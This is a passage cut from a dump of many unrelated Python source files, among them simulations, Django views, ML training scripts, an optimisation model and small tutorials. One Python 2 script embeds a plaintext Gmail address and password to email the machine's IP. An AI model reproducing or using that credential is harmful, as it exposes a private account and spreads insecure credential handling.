        print(f'No canto direito {self.lutador1.nome} pesando {self.lutador1.peso}, com força de {self.lutador1.forca}, ginga de {self.lutador1.ginga} especializado em {self.lutador1.arteMarcial}, no canto esquerdo o adversário {self.lutador2.nome} pesando {self.lutador2.peso}, com força de {self.lutador2.forca}, ginga de {self.lutador2.ginga} especializado em {self.lutador2.arteMarcial}')

    def registraCombate(self):
        # Win probability for fighter 1 is their share of combined force+ginga;
        # a uniform draw decides the outcome and both histories are updated.
        pontosL1 = self.lutador1.forca + self.lutador1.ginga
        pontosTotais = pontosL1 + self.lutador2.forca + self.lutador2.ginga
        chanceDeVitoriaL1 = pontosL1 / pontosTotais
        acaso = random.random()
        resultadoL1 = chanceDeVitoriaL1 >= acaso
        self.lutador1.atualizaHistorico(['vitoria']) if resultadoL1 else self.lutador1.atualizaHistorico(['derrota'])
        self.lutador2.atualizaHistorico(['vitoria']) if not(resultadoL1) else self.lutador2.atualizaHistorico(['derrota'])
        vencedor = self.lutador1.nome if resultadoL1 else self.lutador2.nome
        print(f'{vencedor} venceu o confronto de hoje! Palmas para ele!! (barulho de palmas)')
# Demo / smoke test: two valid fighters, three bouts, then deliberately
# invalid constructions to exercise the validation branches.
luchador1 = Lutador('Kleber',120,5000,3000,"capoeira")
print(luchador1)
luchador2 = Lutador('Waldisney',125,5050,2400,"muay thai")
print(luchador2)
lucha = Luta(luchador1,luchador2)
print(lucha)
lucha.registraCombate()
lucha.registraCombate()
lucha.registraCombate()
lucha.informacoes()
print(luchador1.historicoDeLutas,luchador2.historicoDeLutas)
# Weight difference > 6 kg: Luta prints an error and stays attribute-less.
luchador3 = Lutador('Jamon',145,2000,5090)
luchador4 = Lutador('Guilhermo',85,2100,4050)
combateInvalido = Luta(luchador3,luchador4)
# Wrong attribute types / wrong class: both constructors print errors.
luchador5 = Lutador("so","para","testar","mes","mo")
lucha2 = Luta(luchador5,22)
|
"""
Matchingpennies EEG experiment
"""
study_name = "eeg_matchingpennies"  # label for this pipeline run
bids_root = "~/mne_data/eeg_matchingpennies"  # input BIDS dataset root
deriv_root = "~/mne_data/derivatives/mne-bids-pipeline/eeg_matchingpennies"  # pipeline output root
subjects = ["05"]  # only subject 05 is processed
task = "matchingpennies"
ch_types = ["eeg"]  # analyze EEG channels only
interactive = False  # no blocking GUI windows
# Epoch rejection threshold — presumably peak-to-peak amplitude in volts
# (MNE convention); verify against the pipeline docs.
reject = {"eeg": 150e-6}
conditions = ["raised-left", "raised-right"]
contrasts = [("raised-left", "raised-right")]
decode = True  # run condition decoding
interpolate_bads_grand_average = False
|
#!/usr/bin/env python
import importlib
from nervosum.cli import nervosum_parser
def main() -> None:
    """CLI entry point: import and run the subcommand module chosen by the parser.

    The parser stores the dotted module path in args.nervosum_module; the
    resolved module is expected to expose an execute(args) function.
    """
    args = nervosum_parser.parse_args()
    module = importlib.import_module(args.nervosum_module)
    module.execute(args)  # type: ignore


if __name__ == "__main__":
    main()
|
# NOTE(review): Python 2 syntax (print statements) — will not run under
# Python 3 without porting.
import smtplib
import socket

# NOTE(review): credentials are hard-coded and committed; move to a secret store.
fromaddr = 'mikkel.raspberry@gmail.com'
toaddr = 'mikkel.svagard@gmail.com'
username = fromaddr
password = 'RaspberryPi'

# Discover this machine's outbound IP: a UDP connect() sends no packets but
# binds the socket, so getsockname() reveals the local address.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("gmail.com",80))
yourIP = (s.getsockname()[0])
s.close()

text = "Current IP: " + str(yourIP)
print text

# NOTE(review): "Fom" is a typo for "From" — left unchanged here because it
# is part of the transmitted message (runtime string).
msg = "\r\n".join([
    "Fom: " + fromaddr,
    "To: " + toaddr,
    "Subject: " + text,
    "",
    ""
])

server = smtplib.SMTP('smtp.gmail.com:587')
server.ehlo()
server.starttls()
server.login(username,password)
server.sendmail(fromaddr, toaddr, msg)
server.quit()
print "message sent"
|
# Numbers
# Python numbers fall into three kinds: integers, floats, complex numbers
# All integers in Python are of type int
a = 10
b = 20
# Python ints have unlimited precision, so arbitrarily large values are fine
# NOTE(review): 1 ** 100 is just 1 — a larger base was probably intended to
# demonstrate big integers
c = 1 ** 100
print(a)
print(b)
print(c)
# Long numeric literals may use underscores as digit separators
d = 123_456_789
print(d)
# Integers in other bases
# e = 0123  # decimal literals may not start with 0
# Integers written in other bases still print in decimal
# binary
f = 0b10
# octal
g = 0o10
# hexadecimal
h = 0x10
print(f)
print(g)
print(h)
print(1-5)
# Floats: every decimal number in Python is of type float
i = 1.23
print(i)
# Floating-point arithmetic may produce inexact results
print(2-2.23)
print(0.1 + 0.2)
|
from tacotron2_gst.text import symbols
import yaml
"""
Adapted from https://github.com/jaywalnut310/glow-tts/blob/master/utils.py
"""
class HParams():
    """Hyper-parameter namespace: keys are reachable both as attributes
    (h.key) and as items (h["key"]); nested dicts become nested HParams."""

    def __init__(self, **kwargs):
        for key, value in kwargs.items():
            # Recurse so nested config sections get the same dual access.
            # (Strict type check on purpose: dict subclasses pass through.)
            if type(value) == dict:
                value = HParams(**value)
            self[key] = value

    def __getitem__(self, key):
        """Item access delegates to attribute access."""
        return getattr(self, key)

    def __setitem__(self, key, value):
        """Item assignment delegates to attribute assignment."""
        return setattr(self, key, value)

    def __contains__(self, key):
        return key in self.__dict__

    def __len__(self):
        return len(self.__dict__)

    def __repr__(self):
        return repr(self.__dict__)

    def keys(self):
        return self.__dict__.keys()

    def values(self):
        return self.__dict__.values()

    def items(self):
        return self.__dict__.items()
def create_hparams(model_dir: str) -> HParams:
    """Load a YAML config file into an HParams tree.

    NOTE(review): despite the name, *model_dir* is the path of the YAML
    file itself — it is passed straight to open().
    """
    with open(model_dir, "r") as f:
        config = yaml.safe_load(f)
    hparams = HParams(**config)
    # Next line overwrites dummy variable from YAML
    hparams.model.n_symbols = len(symbols)
    return hparams
|
# flake8: noqa
from __future__ import absolute_import
import pytest
def pytest_addoption(parser):
    """Register ini-file options that locate the cached-dataframe directories."""
    parser.addini('df_cache_root_dir', 'directory of the df_cache_root files')
    parser.addini('df_prep_cache_root_dir', 'directory of the df_prep_cache_root files')
from ._fixtures import *
|
from datasets import load_dataset
from transformers import AutoTokenizer, DataCollatorWithPadding
from transformers import TrainingArguments
from transformers import AutoModelForSequenceClassification
from transformers import Trainer
import numpy as np
from datasets import load_metric
# MRPC paraphrase-pair dataset from the GLUE benchmark, plus the matching
# BERT tokenizer.
raw_datasets = load_dataset("glue", "mrpc")
checkpoint = "bert-base-uncased"
tokenizer = AutoTokenizer.from_pretrained(checkpoint)
def tokenize_function(example):
    """Tokenize a sentence pair; padding is deferred to the data collator."""
    return tokenizer(example["sentence1"], example["sentence2"], truncation=True)
def compute_metrics(eval_preds):
    """Turn the Trainer's (logits, labels) pair into GLUE MRPC metrics."""
    metric = load_metric("glue", "mrpc")
    logits, labels = eval_preds
    # Class prediction = arg-max over the final (label) dimension.
    predictions = np.argmax(logits, axis=-1)
    return metric.compute(predictions=predictions, references=labels)
# Tokenize the whole dataset up front; batched=True processes chunks at once.
tokenized_datasets = raw_datasets.map(tokenize_function, batched=True)
# Pad dynamically per batch instead of to a global maximum length.
data_collator = DataCollatorWithPadding(tokenizer=tokenizer)
training_args = TrainingArguments("test-trainer", evaluation_strategy="epoch")
model = AutoModelForSequenceClassification.from_pretrained(checkpoint, num_labels=2)
trainer = Trainer(
    model,
    training_args,
    train_dataset=tokenized_datasets["train"],
    eval_dataset=tokenized_datasets["validation"],
    data_collator=data_collator,
    tokenizer=tokenizer,
    compute_metrics=compute_metrics
)
trainer.train()
predictions = trainer.predict(tokenized_datasets["validation"])
print(predictions.predictions.shape, predictions.label_ids.shape)
preds = np.argmax(predictions.predictions, axis=-1)
metric = load_metric("glue", "mrpc")
# NOTE(review): the computed metrics are discarded — print or store the result.
metric.compute(predictions=preds, references=predictions.label_ids)
|
#!/bin/python3
import datetime
import network
import os
import sys
import shutil
import zipfile
from getch import getch
from markov import Markov
OUTFILE = "data.txt"    # deduplicated headline corpus fed to the Markov model
GOODFILE = "good.txt"   # headlines the user approved in interactive mode
APP_NAME = "NotNews"
VERSION_MAJOR = 0
VERSION_MINOR = 0
VERSION_BUILD = 1
# TODOlist:
# TODO:
# Get data from panorama.pub?
# generate great news
# post it every hour (twitter, telegram, vk)
# clear old data and repeat on a new day
# add copyrights
def unique(filename):
    """De-duplicate the lines of *filename* in place.

    Line order is not preserved (lines pass through a set), matching the
    original behaviour. FIX: both file handles are now closed
    deterministically via with-blocks.
    """
    with open(filename, encoding="utf-8") as f:
        uniqlines = set(f.readlines())
    with open(filename, 'w', encoding="utf-8") as f:
        f.writelines(uniqlines)
def parse_files(dirname):
    """Extract the headline column from every TSV dump in *dirname* into OUTFILE.

    Each input file has a header line; remaining lines are tab-separated
    with the headline in column 1. The result is de-duplicated in place.
    """
    nonBreakSpace = u'\xa0'
    # FIX: the output handle is now closed even if a read fails mid-way.
    with open(OUTFILE, 'w', encoding="utf-8") as outfile:
        for filename in os.listdir(dirname):
            with open(dirname + "/" + filename, encoding="utf-8") as f:
                next(f)  # skip the header row
                for line in f:
                    data = line.split("\t")
                    # Undo HTML quote entities and non-breaking spaces left
                    # by the feed. NOTE(review): the original replace() source
                    # was garbled; "&quot;" is the evident intent — confirm
                    # against a real data dump.
                    value = data[1].replace("&quot;", "\"").replace(nonBreakSpace, " ")
                    outfile.write(value + "\n")
    unique(OUTFILE)
def get_version():
    """Return the semantic version string, e.g. '0.0.1'."""
    return "{}.{}.{}".format(VERSION_MAJOR, VERSION_MINOR, VERSION_BUILD)
def get_about_info():
    """Return the multi-line about/licence blurb shown for the -a flag."""
    lines = [
        "",
        APP_NAME + " " + get_version() + " Copyright (C) 2020-2021 Yaroslav Zotov.",
        "All news data from https://mediametrics.ru/",
        "This program comes with ABSOLUTELY NO WARRANTY.",
        "This is free software under MIT license; see the LICENSE file for copying conditions.",
        "",
    ]
    return "\n".join(lines)
def get_help_info():  # TODO: help info
    """Return the (currently stub) help text shown for the -h flag."""
    return "\n{} {} Copyright (C) 2020-2021 Yaroslav Zotov.\n".format(APP_NAME, get_version())
def main(argv):
    """Entry point: parse simple flags and run the requested stages.

    Flags: -u update data, -g generate sentences, -i interactive rating,
    -h help, -a about. With no flags at all, -u -g is assumed.
    """
    update_data = False
    generate_sentences = False
    interactive_mode = False
    if len(argv) < 2:
        print("No params specified. Using default values.")
        argv.extend(("-u", "-g"))
    # A set would suffice; the dict merely mimics membership testing.
    args_dict = { i : True for i in argv }
    if "-u" in args_dict:
        update_data = True
    if "-g" in args_dict:
        generate_sentences = True
    if "-h" in args_dict:
        print(get_help_info())
        return
    if "-a" in args_dict:
        print(get_about_info())
        return
    if "-i" in args_dict:
        interactive_mode = True
    if update_data:
        # Fetch yesterday's news dump, unzip it, and rebuild OUTFILE.
        dirname = "rawdata"
        shutil.rmtree(dirname, ignore_errors=True)
        filename = "news.zip"
        yesterday = datetime.date.today() - datetime.timedelta(days=1)
        network.download_file(network.URL.format(yesterday), filename)
        with zipfile.ZipFile(filename, 'r') as zip_ref:
            zip_ref.extractall(dirname)
        parse_files(dirname + "/day")
    if generate_sentences:
        markov = Markov(OUTFILE)
        markov.get_sentences()
    if interactive_mode:
        # Show one generated headline at a time; '+' keeps it, Esc quits.
        markov = Markov(OUTFILE)
        outfile = open(GOODFILE, 'a', encoding="utf-8") # TODO: post these news
        while True:
            sentence = markov.generate_sentence()
            print(sentence)
            user_input = getch()
            if user_input == "\x1b":
                break
            elif user_input == "+":
                outfile.write(sentence + "\n")
            pass
        outfile.close()
if __name__ == '__main__':
    try:
        main(sys.argv)
    except KeyboardInterrupt:
        # Ctrl-C / Ctrl-D end the interactive session quietly.
        exit()
    except EOFError:
        exit()
|
from django.shortcuts import render
# Create your views here.
def music_list(request):
    """Render the music list page (no template context yet)."""
    return render(request, 'music/music_list.html', {})
def main():
    """Read weight (kg) and height (m) and print the BMI category.

    FIX: removed the unused 'import math' and a dead trailing 'pass'.
    """
    peso = float(input("Peso en kg: "))
    altura = float(input("Altura en m: "))
    if peso > 0 and altura > 0:
        # Body-mass index: kg / m^2.
        indice = peso / (altura ** 2)
        if indice < 20:
            print ("PESO BAJO")
        elif 20 <= indice < 25:
            print ("NORMAL")
        elif 25 <= indice < 30:
            print ("SOBREPESO")
        elif 30 <= indice < 40:
            print ("OBESIDAD")
        elif indice >= 40:
            print ("OBESIDAD MORBIDA")
    else:
        print("Revisa tus datos, alguno de ellos es erróneo.")


if __name__=='__main__':
    main()
|
from django.db.models.query import QuerySet
from django.shortcuts import render
from rest_framework.viewsets import ModelViewSet
from backend_app.serializers import SubjectSerializer, TitleSerializer
from backend_app.models import Subject, Title
class SubjectViewSet(ModelViewSet):
    """Full CRUD REST API over Subject rows."""
    queryset = Subject.objects.all()
    serializer_class = SubjectSerializer
class TitleViewSet(ModelViewSet):
    """Full CRUD REST API over Title rows."""
    queryset = Title.objects.all()
    serializer_class = TitleSerializer
|
import simpy
import random
import math
import numpy as np
SIM_TIME = 10 * 60 * 60 * 1000  # total simulated time: 10 hours in ms ticks
FRAME = 1000  # NOTE(review): unused in the visible code — frame length in ticks?
packet_number = 0  # global counter of packets created so far
TIME_BETWEEN_PACKETS = 15 * 60 * 1000  # packet generation period: 15 minutes

# Sleep-interval randomization schemes:
EXPOVARIATE = 0  # exponential draw with the given rate
RANDINT = 1      # uniform integer draw from the given (lo, hi) range
RANDOMIZATION_SCHEME = EXPOVARIATE

# Parameters for the two schemes (rates for EXPOVARIATE, ranges for RANDINT).
TX_SLEEP_RATE = 1/1000
RX_SLEEP_RATE = 1/1000
TX_SLEEP_RANGE = (500, 750)
RX_SLEEP_RANGE = (500, 750)
#TX_SLEEP_RATES = [100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1600, 1700, 1800, 1900, 2000, 2500, 3000]
#RX_SLEEP_RATES = [100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1600, 1700, 1800, 1900, 2000, 2500, 3000]
TX_SLEEP_RATES = np.arange(100, 3100, 100)
RX_SLEEP_RATES = np.arange(100, 3100, 100)
def int_from_range(range):
    """Draw a uniformly random integer from the inclusive (lo, hi) pair."""
    lo, hi = range
    return random.randint(lo, hi)
# Slot lengths, in simulation ticks (presumably ms, matching SIM_TIME).
ACK_TIME = 5
TRANSMIT_SLOT = 9
def format_time(time: int):
    """Render a millisecond tick count as 'H:M:S:ms' (fields unpadded).

    Uses floor division instead of true division: the original relied on
    '%d' silently truncating floats, which loses precision for large tick
    counts. Output is unchanged for all inputs used in this file.
    """
    milliseconds = time % 1000
    total_seconds = time // 1000
    seconds = total_seconds % 60
    minutes = total_seconds // 60 % 60
    # NOTE(review): hours wraps at 60 (kept from the original); SIM_TIME is
    # only 10 hours so the wrap never fires here -- confirm before reuse.
    hours = total_seconds // 60 // 60 % 60
    return '%d:%d:%d:%d' % (hours, minutes, seconds, milliseconds)
class Packet:
    """A single data packet moving through the node chain."""
    def __init__(self, identifier, arrival_time):
        # sequence number assigned by the generator process
        self.identifier = identifier
        # simulation time (ticks) at which the packet was created
        self.arrival_time = arrival_time
        # accumulated ticks spent getting this packet forwarded
        self.transmit_time = 0
class Node:
    """A node in a duty-cycled radio chain.

    A node alternates between sleeping and short active slots. When it holds
    a queued packet and has a downstream child it wakes to transmit;
    otherwise it wakes to listen for its upstream parent's transmission.
    """
    def __init__(self, id):
        self.id = id
        # True only during the TRANSMIT_SLOT ticks of an active transmission
        self.transmitting = False
        # total ticks spent asleep (used for awake-time statistics)
        self.sleep_time_total = 0
        # total ticks spent in transmit cycles (sleep + slot + ack)
        self.tx_mode_ticks = 0
        # FIFO queue of Packet objects held by this node
        self.packet_list = []
    def run(self, env, parent, child, tx, rx):
        """Simpy process: alternate transmit/receive duty cycles forever.

        ``tx``/``rx`` are expovariate rates or (lo, hi) ranges, depending on
        RANDOMIZATION_SCHEME.
        """
        while True:
            if (len(self.packet_list) > 0) and (child is not None):
                # --- transmit cycle: sleep, then occupy one transmit slot ---
                tx_cycle_start_time = env.now
                sleep_time = 0
                if RANDOMIZATION_SCHEME == EXPOVARIATE:
                    sleep_time = random.expovariate(tx)
                else :
                    sleep_time = int_from_range(tx)
                self.sleep_time_total += sleep_time
                yield env.timeout(sleep_time)
                self.packet_list[0].transmit_time += sleep_time
                # print('%s> node %d starts transmitting' % (format_time(env.now), self.id))
                self.transmitting = True
                yield env.timeout(TRANSMIT_SLOT)
                self.transmitting = False
                yield env.timeout(ACK_TIME)
                self.tx_mode_ticks += env.now - tx_cycle_start_time
            else:
                # --- receive cycle: sleep, then listen for the parent ---
                sleep_time = 0
                if RANDOMIZATION_SCHEME == EXPOVARIATE:
                    sleep_time = random.expovariate(rx)
                else :
                    sleep_time = int_from_range(rx)
                self.sleep_time_total += sleep_time
                yield env.timeout(sleep_time)
                # print('%s> node %d starts receiving' % (format_time(env.now), self.id))
                # Wait up to one slot length for the parent to start sending.
                for i in range(TRANSMIT_SLOT):
                    if (parent is not None) and (parent.transmitting == True):
                        break
                    else:
                        yield env.timeout(1)
                # Count how much of the parent's slot we actually overlapped.
                transmission_ticks_recorded = 0
                while (parent is not None) and (parent.transmitting == True):
                    transmission_ticks_recorded += 1
                    yield env.timeout(1)
                if transmission_ticks_recorded == TRANSMIT_SLOT:
                    # Full-slot overlap counts as a successful reception.
                    # print('%s> node %d received packet' % (format_time(env.now), self.id))
                    self.packet_list.append(parent.packet_list.pop(0))
                    # NOTE(review): this updates the packet at the *head* of
                    # this node's queue, not necessarily the one just
                    # appended -- confirm whether [-1] was intended.
                    self.packet_list[0].transmit_time += TRANSMIT_SLOT + ACK_TIME
                    yield env.timeout(ACK_TIME)
def create_packet(node, env):
    """Simpy process: queue a new Packet on *node* every TIME_BETWEEN_PACKETS.

    Increments the module-level ``packet_number`` counter, which doubles as
    the packet identifier.
    """
    global packet_number
    while True:
        yield env.timeout(TIME_BETWEEN_PACKETS)
        fresh = Packet(packet_number, env.now)
        packet_number += 1
        node.packet_list.append(fresh)
def varying_rate():
    """Sweep matched (tx == rx) mean sleep intervals; log to varying_rate.csv.

    Runs one independent simulation per interval and records packet success
    rate, per-node awake-time percentage, and mean per-packet transmit time.
    """
    # create_packet() increments the *module-level* counter. Without this
    # declaration, `packet_number = 0` below creates a local that stays 0 and
    # the success-rate division raises ZeroDivisionError.
    global packet_number
    # `with` guarantees the CSV is flushed and closed (the original leaked
    # the handle until interpreter exit).
    with open("varying_rate.csv", "w") as f:
        f.write("tx_rate,rx_rate,pkt_success,n0_awake_time,n1_awake_time,avg_transmission_time_per_pkt\n")
        for tx_ms, rx_ms in zip(TX_SLEEP_RATES, RX_SLEEP_RATES):
            tx_rate = 1 / tx_ms
            rx_rate = 1 / rx_ms
            packet_number = 0  # reset the shared counter for this run
            env = simpy.Environment()
            n0 = Node(0)
            n1 = Node(1)
            env.process(create_packet(n0, env))
            env.process(n0.run(env, None, n1, tx_rate, rx_rate))
            env.process(n1.run(env, n0, None, tx_rate, rx_rate))
            env.run(until=SIM_TIME)
            print("\n---INPUT---")
            print("simulation time: %s" % format_time(SIM_TIME))
            print("time between packets: %s" % format_time(TIME_BETWEEN_PACKETS))
            f.write("{0},{1},".format(tx_ms, rx_ms))
            if RANDOMIZATION_SCHEME == EXPOVARIATE:
                print("randomization scheme: expovariate")
                print("tx sleep rate: %f" % tx_rate)
                print("rx sleep rate: %f" % rx_rate)
            else:
                print("randomization scheme: randint")
                print('tx range = (%d, %d)' % TX_SLEEP_RANGE)
                print('rx range = (%d, %d)' % RX_SLEEP_RANGE)
            print("\n---RESULTS---")
            pkt_success = len(n1.packet_list) / packet_number
            n0_awake_time = (SIM_TIME - n0.sleep_time_total) / SIM_TIME * 100
            n1_awake_time = (SIM_TIME - n1.sleep_time_total) / SIM_TIME * 100
            print("packets: %d/%d" % (len(n1.packet_list), packet_number))
            print("node 0 awake time: {0:.5f}%".format(n0_awake_time))
            print("node 1 awake time: {0:.5f}%\n".format(n1_awake_time))
            avg_time_to_transmit_packet = n0.tx_mode_ticks / packet_number
            print('avg time to transmit packet = %s' % format_time(avg_time_to_transmit_packet))
            f.write("{0},{1},{2},{3}\n".format(pkt_success, n0_awake_time, n1_awake_time, avg_time_to_transmit_packet))
if __name__ == '__main__':
    #varying_rate()
    # Sweep every (tx, rx) sleep-interval combination and record results.
    f = open("differing_rate.csv", "w")
    try:
        f.write("tx_rate,rx_rate,pkt_success,n0_awake_time,n1_awake_time,avg_transmission_time_per_pkt\n")
        # meshgrid + nested zip enumerates the full cartesian product.
        x, y = np.meshgrid(TX_SLEEP_RATES, RX_SLEEP_RATES)
        for col, row in zip(x, y):
            for tx_ms, rx_ms in zip(col, row):
                # Write the pair ONCE: the original wrote it twice (before and
                # after env.run), producing 8 fields per row against the
                # 6-column header.
                f.write("{0},{1},".format(tx_ms, rx_ms))
                tx_rate = 1 / tx_ms
                rx_rate = 1 / rx_ms
                packet_number = 0  # reset the shared counter for this run
                env = simpy.Environment()
                n0 = Node(0)
                n1 = Node(1)
                env.process(create_packet(n0, env))
                env.process(n0.run(env, None, n1, tx_rate, rx_rate))
                env.process(n1.run(env, n0, None, tx_rate, rx_rate))
                env.run(until=SIM_TIME)
                print("\n---INPUT---")
                print("simulation time: %s" % format_time(SIM_TIME))
                print("time between packets: %s" % format_time(TIME_BETWEEN_PACKETS))
                if RANDOMIZATION_SCHEME == EXPOVARIATE:
                    print("randomization scheme: expovariate")
                    print("tx sleep rate: %f" % tx_rate)
                    print("rx sleep rate: %f" % rx_rate)
                else:
                    print("randomization scheme: randint")
                    print('tx range = (%d, %d)' % TX_SLEEP_RANGE)
                    print('rx range = (%d, %d)' % RX_SLEEP_RANGE)
                print("\n---RESULTS---")
                pkt_success = len(n1.packet_list) / packet_number
                n0_awake_time = (SIM_TIME - n0.sleep_time_total) / SIM_TIME * 100
                n1_awake_time = (SIM_TIME - n1.sleep_time_total) / SIM_TIME * 100
                print("packets: %d/%d" % (len(n1.packet_list), packet_number))
                print("node 0 awake time: {0:.5f}%".format(n0_awake_time))
                print("node 1 awake time: {0:.5f}%\n".format(n1_awake_time))
                avg_time_to_transmit_packet = n0.tx_mode_ticks / packet_number
                print('avg time to transmit packet = %s' % format_time(avg_time_to_transmit_packet))
                f.write("{0},{1},{2},{3}\n".format(pkt_success, n0_awake_time, n1_awake_time, avg_time_to_transmit_packet))
    finally:
        # The original never closed the CSV handle.
        f.close()
from django import template
register = template.Library()
@register.filter
def addCss(value, arg):
    """Template filter: render a bound form field with *arg* as its CSS class."""
    widget_attrs = {'class': arg}
    return value.as_widget(attrs=widget_attrs)
|
# Truth tables for Python's three boolean operators.
# `and` is true only when both operands are true.
assert (True and True) == True
assert (True and False) == False
assert (False and True) == False
assert (False and False) == False
# `or` is true when at least one operand is true.
assert (True or True) == True
assert (True or False) == True
assert (False or True) == True
assert (False or False) == False
# `not` inverts its operand.
assert (not True) == False
assert (not False) == True
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 5 22:38:43 2020
@author: hoale
"""
"""
This file contains solver for feasibility problem by GUROBI (2nd MILP subproblem)
"""
import gurobi as grb
""" Creation of MILP model with constraints """
def _create_model(job_num, machine_num, job_ids, r_times, d_times, p_intervals, assign, prev_start_time):
    """Build the GUROBI feasibility model (2nd MILP subproblem).

    Parameters:
        job_num, machine_num: problem sizes.
        job_ids: iterable of job identifiers.
        r_times, d_times: release / due times, aligned with job_ids.
        p_intervals: per-job list of processing times, one entry per machine.
        assign: solved assignment variables from the 1st subproblem;
            assign[(i, m)].x == 1 means job i is fixed on machine m.
        prev_start_time: unused here; kept for interface compatibility.

    Returns:
        (model, y, ts): the model, sequencing binaries, and start-time vars.
    """
    # I': jobs the first subproblem assigned to some machine.
    set_I_apos = [i_id for m_id in range(machine_num) for i_id in range(job_num) if assign[(i_id, m_id)].x == 1]
    # z': the machine each assigned job was placed on.
    z_apos = {i_id: m_id for m_id in range(machine_num) for i_id in range(job_num) if assign[(i_id, m_id)].x == 1}
    # Index sets for the decision variables.
    jobs = tuple(job_ids)
    print("inside:", jobs)
    machines = tuple(range(machine_num))
    print(machines)
    # Ordered pairs of distinct assigned jobs (sequencing decisions).
    job_pairs_apos = [(i, j) for i in set_I_apos for j in set_I_apos if i != j]
    print(job_pairs_apos)
    # Assignment of jobs on machines.
    job_machine_pairs = [(i, m) for i in jobs for m in machines]
    print(job_machine_pairs)
    # Model parameters (dictionaries keyed by job id).
    release_time = dict(zip(jobs, tuple(r_times)))
    print("release time:", release_time)
    due_time = dict(zip(jobs, tuple(d_times)))
    print("due time:", due_time)
    process_time = dict(zip(jobs, tuple(p_intervals)))
    print("process time:", process_time)
    # BigU: upper bound on total processing time (debug prints kept).
    for i in range(job_num):
        print(max(p_intervals[i]))
    U = sum([max(p_intervals[i]) for i in range(job_num)])
    print("test U:", U)
    # Create model.
    model = grb.Model("SSJSP")
    # Decision variables.
    # 1. Assignments of jobs on machines.
    x = model.addVars(job_machine_pairs, vtype=grb.GRB.BINARY, name="assign")
    # 2. Sequence (order) of executing assigned jobs.
    y = model.addVars(job_pairs_apos, vtype=grb.GRB.BINARY, name="sequence")
    # 3. Start time of executing each job (ts = time_start).
    ts = model.addVars(jobs, lb=0, name="start_time")
    # Pure feasibility problem: constant objective.
    model.setObjective(0)
    # Constraints.
    # 1. Job release time.
    model.addConstrs((ts[i] >= release_time[i] for i in set_I_apos), name="assigned job release constraint")
    # 2. Job due time (processing time taken on the machine fixed by z').
    model.addConstrs((ts[i] <= due_time[i] - process_time[i][z_apos[i]] for i in jobs), name="assigned job due constraint")
    # 3. Either job i precedes job j or vice versa (assigned jobs only).
    model.addConstrs((y[(i,j)] + y[(j,i)] == 1 for (i,j) in job_pairs_apos if i > j), name="sequence of assigned jobs")
    # 4. Valid cut on start times, with the latest due date as big-M.
    # FIX: the original wrote `max(due_time.values())(1 - y[(i,j)])`,
    # which *calls* a number (TypeError); the `*` was missing.
    big_M = max(due_time.values())
    model.addConstrs((ts[j] >= ts[i] + process_time[i][z_apos[i]] - big_M * (1 - y[(i,j)])
                      for (i,j) in job_pairs_apos), name="valid cut by big-M")
    return model, y, ts
"""ecomproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from order import views as OrderViews
from user import views as UserViews
from home import views as HomeViews
# URL routes: app-level includes first, then standalone function views.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', include('home.urls')),
    path('product/', include('product.urls')),
    path('order/', include('order.urls')),
    path('ckeditor/', include('ckeditor_uploader.urls')),
    path('user/', include('user.urls')),
    path('shopcart/', OrderViews.shopcart, name='shopcart'),
    path('login/', UserViews.login_page, name="login"),
    path('signup/', UserViews.signup_page, name="signup"),
    path('logout/', UserViews.logout_page, name="logout"),
    path('faq/', HomeViews.Faq, name="faq"),
]
# Serve user-uploaded media files (MEDIA_URL) via Django itself.
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Dos Santos Julien'
import random
from Tkinter import *
from tkMessageBox import *
class De(StringVar):
    """A six-sided die whose face value is held in a Tk StringVar.

    ``keep`` is a checkbox-backed flag: when set, lancer() leaves the
    current face untouched.
    """
    def __init__(self):
        StringVar.__init__(self)
        # randrange's upper bound is exclusive: the original (1, 6) could
        # never roll a 6, so the die only had five reachable faces.
        self.set(random.randrange(1, 7))
        self.keep = IntVar()
    def lancer(self):
        """Re-roll the die unless the player chose to keep it."""
        if self.keep.get() == 0:
            self.set(random.randrange(1, 7))
class Jeu(Tk):
    """Main window for a three-dice game (Python 2 / Tkinter).

    The player rolls until the three dice sum to 7 with at least one 4
    showing; individual dice can be "kept" between rolls.
    """
    def __init__(self):
        Tk.__init__(self)
        # number of rolls since the last reset
        self.count = 0
        self.d1, self.d2, self.d3 = De(),De(),De()
        self.btLancer = Button(self, text="Lancer", command=self.lancer)
        # NOTE(review): these assignments rebind self.raz / self.exit from
        # the bound methods to the Button widgets. command= captured the
        # method first, so it works, but the shadowing is fragile -- confirm.
        self.raz = Button(self,text="RAZ",command=self.raz)
        self.exit = Button(self,text="Quitter",command=self.exit)
        self.c1 = Checkbutton(text="Keep ?", variable=self.d1.keep,onvalue=True, offvalue=False)
        self.c2 = Checkbutton(text="Keep ?", variable=self.d2.keep,onvalue=True, offvalue=False)
        self.c3 = Checkbutton(text="Keep ?", variable=self.d3.keep,onvalue=True, offvalue=False)
        self.label1 = Label(self,textvariable=self.d1)
        self.label12 = Label(self,textvariable=self.d2)
        self.label3 = Label(self,textvariable=self.d3)
        self.label1.pack()
        self.label12.pack()
        self.label3.pack()
        self.btLancer.pack()
        self.raz.pack()
        self.exit.pack()
        self.c1.pack()
        self.c2.pack()
        self.c3.pack()
        self.mainloop()
    def lancer(self):
        """Roll all non-kept dice, count the attempt, check for a win."""
        self.d1.lancer()
        self.d2.lancer()
        self.d3.lancer()
        self.count += 1
        self.check()
    def raz(self):
        """Reset: re-roll everything, zero the counter, clear the keeps."""
        print str(self.count)
        print "raz"
        self.lancer()
        self.count = 0
        self.c1.deselect()
        self.c2.deselect()
        self.c3.deselect()
        print str(self.count)
    def check(self):
